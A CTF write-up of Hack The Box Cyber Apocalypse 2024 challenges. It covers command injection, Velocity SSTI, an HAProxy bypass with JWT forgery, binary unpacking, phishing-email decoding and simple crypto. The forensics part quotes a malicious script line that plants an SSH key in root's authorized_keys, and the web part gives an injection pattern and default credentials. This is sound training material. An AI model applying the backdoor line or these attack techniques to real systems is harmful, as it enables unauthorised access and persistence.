
Hackthebox CyberApocalypse 2024 CTF Writeup

Hello everybody reading this :). This is a writeup on how we solved some of the challenges hosted in the Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale". The categories range over Web, Misc, Reverse Engineering, PWN, Forensics and Cryptography.

NOTE : The challenges were solved by me, @alienX and the others who were in the team :)

Web Challenges

Flag Command (Very Easy - 300 points)

Description

image

Provided with the challenge description above, I spawned the Docker instance and started solving this challenge!

Solution

I opened the app in the browser and intercepted the requests using Burp Suite. I was able to capture some interesting requests after playing around with the web app by inputting the command "start":

image

From Burp Suite I was able to retrieve an endpoint dumping all commands to be executed, /api/options:

image

As seen, there is a command "Blip-blop, in a pickle with a hiccup! Shmiggity-shmack". I proceeded by sending that as a command and received the response with the flag:

image

FLAG : HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}

KORP Terminal (Very Easy - 300 points)

Description

image

Solution

I overthought this one a bit, but after spawning the Docker instance and opening it in the browser we are presented with a login page.

image

Using the credentials admin:password123 I was able to get the flag:

image

FLAG : HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}

TimeKORP

Description

image

Solution

Provided with the source code, we are required to analyze it and get the flag from the web app. Opening the web app we are first presented with the current time, and there is a button at the top left saying "What's the date?":

image

Clicking on that, the URI changes to something interesting:

image

Smells like command injection! Reviewing the source code I could see that the vulnerable point is the ?format= parameter, through which we can perform command injection:

image

Now we can easily escape this by running something such as ;' [command-here]':

image

FLAG : HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}

Labyrinth Linguist (Easy - 300 points)

Description

image

This was an interesting challenge, as I faced a technology which is rarely seen in real environments. First opening the web application, I am greeted by a site asking for input, with some weird text written below:

image

Providing a sample word, it gives weird text as a response; that's Voxalith, the translated language. I head back to reviewing the source code:

image

Then I discovered something interesting about how it renders my input: the template engine used is Velocity, which is vulnerable to SSTI when used the way the source code above does. After reading multiple articles I came across a working payload, and running it I was able to get the flag:

image

FLAG : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}

References

Apache Velocity Server Side Template Injection

LockTalk (Medium - 300 points)

Description

image

Solution

Alright, we are provided with source code available for download, and spawning the instance runs the web app on a certain host. The web application is more of an API with about 3 features:

image

Trying to generate a JWT token gives us an unauthorized error:

image

Heading back to the source code to review what is going on, we can see that this route is available to the guest user:

image

But what's making it say 403??? Well, reading the haproxy.cfg file we get our answer:

image

There are two ways to bypass this: the first is by URL-encoding the path /api/v1/get_ticket and the second is by exploiting CVE-2023-45539. Let's take a look at both.

URL ENCODING

image

CVE-2023-45539

image

Adding a # at the end of our URI bypasses the HAProxy configuration rule and provides us with the token. Now the token uses the algorithm PS256. After a few minutes of google-fu I found CVE-2022-39227, a vulnerability which allows an attacker to forge claims from a pregenerated token. Using the exploit https://github.com/user0x1337/CVE-2022-39227 I was able to generate the token and use it to get the flag:

image

FLAG : HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}

Reverse Engineering

BoxCutter (Very Easy - 300 points)

Description

image

Solution

This was quick; in less than a minute I had the flag. After downloading the binary I first tried tracing every call as the binary executed, and I was able to get the flag from the output as I was analyzing it:

image

FLAG : HTB{tr4c1ng_th3_c4ll5}

PackedAway (Very Easy - 300 points)

Description

image

Solution

The name of the challenge itself hints at how to solve it. First I check whether the file is packed by looking for suspicious strings:

image

As seen above, the binary is packed using UPX. I now proceed to decompress it to retrieve the original binary:

image

Using rabin2 I was able to fetch all readable strings and among them was the flag:

image

FLAG : HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd}

LootStash (Very Easy - 300 points)

Description

image

Solution

Given that the flag is on the stack, it was easy for me to get it by fetching all readable strings and grepping the word "HTB" out of them:

image

FLAG : HTB{n33dl3_in_a_l00t_stack}

Crushing (Easy - 300 points)

Description

image

Forensics

An Unusual Sighting (Very Easy - 300 points)

Description

image

Solution

Start an instance and interact with the Docker instance to solve the challenge.

Screenshot from 2024-03-11 11-41-58

FLAG: HTB{B3sT_0f_luck_1n_th3_Fr4y!!}

Urgent (Very Easy - 300 points)

Description

Screenshot 2024-03-11 at 11-05-16 HTB - Capture The Flag

Solution

Another easy forensics challenge, let's take it down. Easy forensics LOL.

After unzipping the file, I found inside a file encoded with base64:

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/urgent]
└─$ ls
'Urgent Faction Recruitment Opportunity - Join Forces Against KORP™ Tyranny.eml'   forensics_urgent.zip

I found this interesting encoded text:

Screenshot from 2024-03-11 11-10-40

and decided to decode it using CyberChef as follows:

Screenshot 2024-03-11 at 11-10-19 From Base64 - CyberChef

And if you take a deep look you will see a JavaScript encoded text. I went direct, copied it and tried to decode it again using CyberChef, and guess what, b00m:

Screenshot 2024-03-11 at 11-13-50 URL Decode - CyberChef

FLAG: HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT}
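The same two decode layers (MIME base64, then the percent-escaped JavaScript payload) as a script, added here as an example and not part of the original writeup; the .eml, attachment name and flag value below are constructed for the demo, not the challenge's real file:

```python
"""Triage a phishing .eml: decode the base64 attachment, then URL-decode the
percent-escaped payload inside it and look for a flag."""
import base64
import email
import email.policy
import re
import urllib.parse

URLENC_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}){4,}")   # runs of %XX escapes
FLAG_RE = re.compile(r"HTB\{[^}]*\}")


def pct_encode_all(text: str) -> str:
    """Escape every byte as %XX, mimicking the obfuscation seen in the attachment."""
    return "".join(f"%{b:02X}" for b in text.encode())


def build_sample_eml() -> bytes:
    """Constructed sample message (not the real challenge file) with a base64 HTML attachment."""
    html = ("<script>document.write(unescape('"
            + pct_encode_all("<h1>HTB{c0nstructed_s4mple_fl4g}</h1>") + "'))</script>")
    b64 = base64.b64encode(html.encode()).decode()
    return (
        "From: recruiter@example.invalid\r\nTo: you@example.invalid\r\n"
        "Subject: Urgent Faction Recruitment Opportunity\r\nMIME-Version: 1.0\r\n"
        'Content-Type: multipart/mixed; boundary="b1"\r\n\r\n'
        "--b1\r\nContent-Type: text/plain\r\n\r\nSee attached.\r\n"
        '--b1\r\nContent-Type: text/html; name="attachment.htm"\r\n'
        "Content-Transfer-Encoding: base64\r\n"
        'Content-Disposition: attachment; filename="attachment.htm"\r\n\r\n'
        f"{b64}\r\n--b1--\r\n"
    ).encode()


def decode_attachments(eml_bytes: bytes):
    """Return [(filename, decoded_text, [url_decoded_blobs])] for every attachment."""
    msg = email.message_from_bytes(eml_bytes, policy=email.policy.default)
    out = []
    for part in msg.iter_attachments():
        raw = part.get_payload(decode=True) or b""   # undoes base64 / quoted-printable
        text = raw.decode("utf-8", errors="replace")
        blobs = [urllib.parse.unquote(m) for m in URLENC_RE.findall(text)]
        out.append((part.get_filename(), text, blobs))
    return out


def find_flags(eml_bytes: bytes):
    """Flags visible in any attachment after both decode layers."""
    flags = []
    for _name, text, blobs in decode_attachments(eml_bytes):
        for candidate in [text, *blobs]:
            flags.extend(FLAG_RE.findall(candidate))
    return flags
```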

It Has Begun

Description

Screenshot 2024-03-11 at 11-16-26 HTB - Capture The Flag

Solution

It's another easy challenge; this one I solved very fast because it was easy, man. Let's get the flag.

I downloaded the file:

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/begun]
└─$ mv ~/Downloads/forensics_it_has_begun\(2\).zip .
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/begun]
└─$ unzip forensics_it_has_begun\(2\).zip 
Archive:  forensics_it_has_begun(2).zip
  inflating: script.sh 

We got a bash script, let's read it now:

Screenshot from 2024-03-11 11-20-33

Now I looked closely at the script and understood what it does, but within it there are some strange encoded strings. Let's decode them now:

echo "ssh-rsa AAAAB4NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D7s4J0L7XV2kep0rNzgY1S1IdE8HDAf7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsM$
+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B user@tS_u0y_ll1w{BTH" >> /root/.ssh/authorized_keys 

The user section, 'tS_u0y_ll1w{BTH', was very strange to me, so I went and reversed it:

Screenshot from 2024-03-11 11-27-29

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF]
└─$ flag: HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!}

PWN

Tutorial

Description

Screenshot 2024-03-11 at 13-46-06 HTB - Capture The Flag

Solution

Let's interact with the instance we have here via the netcat command from our terminal.

Screenshot from 2024-03-11 13-51-40

The idea behind this challenge was integer overflow. We were given a sample binary written in C so that we can see how to answer the Docker instance directly; let's not waste time with this challenge.

Screenshot from 2024-03-11 13-57-34

flag: HTB{gg_3z_th4nk5_f0r_th3_tut0r14l}

Reference: https://en.wikipedia.org/wiki/Integer_overflow
Reference: https://www.welivesecurity.com/2022/02/21/integer-overflow-how-it-occur-can-be-prevented/

MISC

Character (Very Easy - 300 points)

Description

Screenshot 2024-03-11 at 09-57-13 Cyber Apocalypse 2024 Hacker Royale HTB CTF

Solution

As usual, spawn the Docker instance; after starting it we are given a port and IP address. Let's connect via the terminal now.

command: nc 94.237.54.161 47922

And as you can see below, we have been given an instance that, once we input an index, gives out the character of the flag at that index, and as we all know the flag starts with HTB{:

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF]
└─$ nc 94.237.54.161 47922
Which character (index) of the flag do you want? Enter an index: 0
Character at Index 0: H
Which character (index) of the flag do you want? Enter an index: 1
Character at Index 1: T
Which character (index) of the flag do you want? Enter an index: 2
Character at Index 2: B
Which character (index) of the flag do you want? Enter an index: 3
Character at Index 3: {
Which character (index) of the flag do you want? Enter an index: 
Character at Index 97: l
Which character (index) of the flag do you want? Enter an index: 98
Character at Index 98: 0
Which character (index) of the flag do you want? Enter an index: 99
Character at Index 99: n
Which character (index) of the flag do you want? Enter an index: 10
Character at Index 10: s
Which character (index) of the flag do you want? Enter an index: 100
Character at Index 100: g
Which character (index) of the flag do you want? Enter an index: 101
Character at Index 101: !
Which character (index) of the flag do you want? Enter an index: 102
Character at Index 102: !
Which character (index) of the flag do you want? Enter an index: 103
Character at Index 103: }
Which character (index) of the flag do you want? Enter an index: 

If you continue you will notice that the flag is very long, so I did this manually at first, where you can just write a script to automate this by grepping the flag character after every index.

TOTAL NUMBER OF CHARACTERS (0-104)

flag: HTB{tH15_1s_4_r3aLly_l0nG_fL4g_i_h0p3_f0r_y0Ur_s4k3_tH4t_y0U_sCr1pTEd_tH1s_oR_els3_iT_t0oK_qU1t3_l0ng!!}
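The automation mentioned above, written out as an added example (not the authors' script): it drives the same prompt/answer exchange shown in the netcat session, checks that each reply carries the index it asked for, and stops at the closing brace. The host and port are command-line arguments; FakeService and its flag are constructed for offline testing.

```python
"""Automate the Character challenge: request every index and reassemble the flag."""
import re
import socket
import sys

# Reply format exactly as shown in the netcat session above.
ANSWER_RE = re.compile(r"Character at Index (\d+): (.)")


def recover_flag(ask, max_len=512):
    """Drive the protocol via ask(index) -> reply text; stop at the closing brace."""
    chars = []
    for index in range(max_len):
        reply = ask(index)
        match = ANSWER_RE.search(reply)
        # Guard against desynchronised replies (a skipped or repeated index).
        if match is None or int(match.group(1)) != index:
            raise ValueError(f"unexpected reply for index {index}: {reply!r}")
        chars.append(match.group(2))
        if match.group(2) == "}":
            return "".join(chars)
    raise ValueError(f"no closing brace within {max_len} characters")


def socket_asker(sock):
    """Wrap a connected socket (the nc target) into an ask(index) callable."""
    stream = sock.makefile("rwb", buffering=0)

    def ask(index):
        stream.write(f"{index}\n".encode())
        # The prompt has no trailing newline, so one readline() returns
        # "...Enter an index: Character at Index N: c\n"; search() copes with that.
        while True:
            line = stream.readline().decode(errors="replace")
            if not line:
                raise ConnectionError("service closed the connection")
            if "Character at Index" in line:
                return line
    return ask


class FakeService:
    """Offline stand-in for the remote service; the flag passed in is constructed."""
    def __init__(self, flag):
        self.flag = flag

    def ask(self, index):
        prompt = "Which character (index) of the flag do you want? Enter an index: "
        return f"{prompt}Character at Index {index}: {self.flag[index]}\n"


if __name__ == "__main__":
    host, port = sys.argv[1], int(sys.argv[2])      # the nc host and port
    with socket.create_connection((host, port), timeout=10) as sock:
        print(recover_flag(socket_asker(sock)))
```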

CRYPTOGRAPHY

makeshift

Description

Screenshot 2024-03-11 at 10-15-00 Cyber Apocalypse 2024 Hacker Royale HTB CTF

Solution

It's another easy challenge from cryptography. Let's download the file first and see what we can do here.

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/make]
└─$ unzip crypto_makeshift.zip 
Archive:  crypto_makeshift.zip
   creating: challenge/
  inflating: challenge/source.py     
 extracting: challenge/output.txt    
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/make]
└─$ cd challenge 
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ ls
output.txt  source.py
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat output.txt          
!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat source.py 
from secret import FLAG

flag = FLAG[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)

We have been given a scrambled ciphertext, so we need to recover the flag. It's very easy because we can use the given source code to recover the flag like this:

First of all I am going to edit the source file, because it's not possible to run it with the imported 'secret' module, which is not available:

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ nano source.py        
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ cat source.py   
FLAG = "!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB"

flag = FLAG[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)
                                                                                                                                                                                                                                              
┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge]
└─$ python3 source.py      
HTB{4_b3tTeR_w3apOn_i5_n3edeD!?!}                              
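Re-running source.py on the ciphertext works because the transform is its own inverse: reversing a string whose triples were rotated left is the same as rotating the triples of the reversed string right, so applying "reverse, then rotate left" twice cancels out. As an added example (not from the challenge or the authors), here is the inverse written out explicitly next to the original transform:

```python
"""Explicit decoder for the makeshift scramble, alongside the original transform."""

# The ciphertext printed in challenge/output.txt above.
CIPHERTEXT = "!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB"


def encode(flag: str) -> str:
    """The challenge's transform: reverse, then rotate each triple (a,b,c) -> (b,c,a)."""
    if len(flag) % 3:
        raise ValueError("length must be a multiple of 3, as source.py assumes")
    rev = flag[::-1]
    return "".join(rev[i + 1] + rev[i + 2] + rev[i] for i in range(0, len(rev), 3))


def decode(cipher: str) -> str:
    """Undo encode() step by step: rotate each triple back (b,c,a) -> (a,b,c), then reverse."""
    if len(cipher) % 3:
        raise ValueError("length must be a multiple of 3")
    rev = "".join(cipher[i + 2] + cipher[i] + cipher[i + 1]
                  for i in range(0, len(cipher), 3))
    return rev[::-1]


def is_involution(sample: str) -> bool:
    """Check the property the writeup relies on: encode(encode(x)) == x."""
    return encode(encode(sample)) == sample
```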

Dynastic

Description

Screenshot 2024-03-11 at 10-53-37 HTB - Capture The Flag

Solution

FLAG

HTB{DID_YOU_KNOW_ABOUT_THE_TRITHEMIUS_CIPHER?!_IT_IS_SIMILAR_TO_CAESAR_CIPHER}